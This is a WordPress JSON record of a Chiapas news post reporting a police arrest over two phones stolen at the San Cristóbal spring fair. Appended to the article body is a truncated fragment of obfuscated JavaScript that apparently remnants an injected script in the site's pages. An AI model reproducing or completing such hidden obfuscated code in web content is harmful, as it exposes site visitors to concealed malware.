{"id":14919,"date":"2024-04-03T03:42:41","date_gmt":"2024-04-03T03:42:41","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=14919"},"modified":"2024-04-03T03:42:42","modified_gmt":"2024-04-03T03:42:42","slug":"detienen-a-presunto-responsable-de-robo-de-celular-dentro-de-la-feria-en-san-cristobal","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=14919","title":{"rendered":"Detienen a presunto responsable de robo de celular dentro de la feria en San Crist\u00f3bal"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"503\" height=\"652\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/FB_IMG_1712115680683.jpg\" alt=\"\" class=\"wp-image-14920\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/FB_IMG_1712115680683.jpg 503w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/04\/FB_IMG_1712115680683-231x300.jpg 231w\" sizes=\"auto, (max-width: 503px) 100vw, 503px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal 02 de abril del 2024. San Crist\u00f3bal de Las Casas.- Como resultado del dispositivo de seguridad instalado en el interior y exterior de la Feria de la Primavera y de la Paz, elementos de la Polic\u00eda Municipal lograron la detenci\u00f3n y puesta a disposici\u00f3n ante el ministerio p\u00fablico de Juan Carlos &#8220;N N&#8221;, como probable responsable del delito de robo de celulares, en agravio de una mujer y de un menor de edad, de identidad resguardada.Los hechos se registraron alrededor de las 00:02 minutos de este martes en el interior del parque de feria donde el imputado, aprovechando que los agraviados asist\u00edan a un concierto musical, sustrajo de entre sus pertenencias un iPhone 13 y un iPhone 15, respectivamente y que Nayeli &#8220;N N&#8221;, de 19 a\u00f1os, al percatarse de que se daba a la fuga con su tel\u00e9fono, pidi\u00f3 apoyo a la polic\u00eda para detenerlo.Ante lo ocurrido, elementos municipales lograron su detenci\u00f3n, traslad\u00e1ndolo a la Fiscal\u00eda de Distrito Altos para que \u00e9sta autoridad determine su situaci\u00f3n jur\u00eddica, haciendo un nuevo llamado a la ciudadan\u00eda, para que si reconocen al detenido y fueron v\u00edctima de alg\u00fan delito, presenten su denuncia, a fin de que se aplique la Ley a esta persona y no pueda recuperar su libertad.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal 02 de abril del 2024. San Crist\u00f3bal de Las Casas.- Como resultado del dispositivo de seguridad instalado en el interior y exterior de la Feria de la Primavera y de la Paz, elementos de la Polic\u00eda Municipal lograron la detenci\u00f3n y puesta a disposici\u00f3n ante el ministerio p\u00fablico de Juan Carlos &#8220;N &hellip;<\/p>\n","protected":false},"author":2,"featured_media":14920,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-14919","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14919","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=14919"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14919\/revisions"}],"predecessor-version":[{"id":14921,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14919\/revisions\/14921"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/14920"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=14919"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=14919"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=14919"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}